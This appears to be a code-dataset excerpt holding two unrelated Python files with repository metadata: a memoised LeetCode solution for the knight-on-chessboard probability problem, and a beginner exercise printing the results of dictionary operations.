2ca0d45e9ea3b99ccef5f4796d87ba41c840ec09 | 8a780cb47eac9da046bdb5d6917f97a086887603 | /problems/knight_probability_in_chessboard/solution.py | 10dda0383885961f2992842af8d8eaf2428dcd79 | [] | no_license | dengl11/Leetcode | d16315bc98842922569a5526d71b7fd0609ee9fb | 43a5e436b6ec8950c6952554329ae0314430afea | refs/heads/master | 2022-12-20T03:15:30.993739 | 2020-09-05T01:04:08 | 2020-09-05T01:04:08 | 279,178,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | class Solution:
def knightProbability(self, N: int, K: int, r: int, c: int) -> float:
cache = {} # {(i, j, k): prob of next being on-board}
def query(i, j, K):
if i < 0 or i >= N or j < 0 or j >= N: return 0
if K == 0: return 1
if (i, j, K) in cache: return cache[(i, j, K)]
ans = 0
for di, dj in [(1, 2), (1, -2), (2, 1), (2, -1), (-1, 2), (-1, -2), (-2, 1), (-2, -1)]:
ii, jj = i + di, j + dj
ans += query(ii, jj, K-1)
ans = ans / 8
cache[(i, j, K)] = ans
return ans
return query(r, c, K)
| [
"ldeng1314@gmail.com"
] | ldeng1314@gmail.com |
913f92b3adfc7f05a0427c18c2608c21d2b86f48 | 21540ab033e180a3d94b270b7faffac7fe4af68f | /wordshop5/Exercise_1-3_page_158/Exercise_2.py | 2d13b4e75725362eed75c0970cc5a55c08a9b96d | [] | no_license | tuan102081/wordshop1.2.3.5 | eaa344bdb04f565d1354b9476b4d4ecafc5cc7f3 | 70e75b56f48a2e5b1622d956f33831f80e64d368 | refs/heads/master | 2023-07-14T23:26:31.089484 | 2021-08-30T18:53:24 | 2021-08-30T18:53:24 | 401,411,439 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 640 | py | """
Author: Nguyen Duy Tuan
Date: 31/08/2021
Program: Exercise_02.py
Problem:
Assume that the variable data refers to the dictionary {'b':20, 'a':35}. Write the
values of the following expressions:
a. data['a']
b. data.get('c', None)
c. len(data)
d. data.keys()
e. data.values()
f. data.pop('b')
g. data # After the pop above
Solution:
display:
35
None
2
dict_keys(['b', 'a'])
dict_values([20, 35])
20
{'a': 35}
"""
data = {'b': 20, 'a': 35}
print(data['a'])
print(data.get('c', None))
print(len(data))
print(data.keys())
print(data.values())
print(data.pop('b'))
print(data) | [
"you@example.com"
] | you@example.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.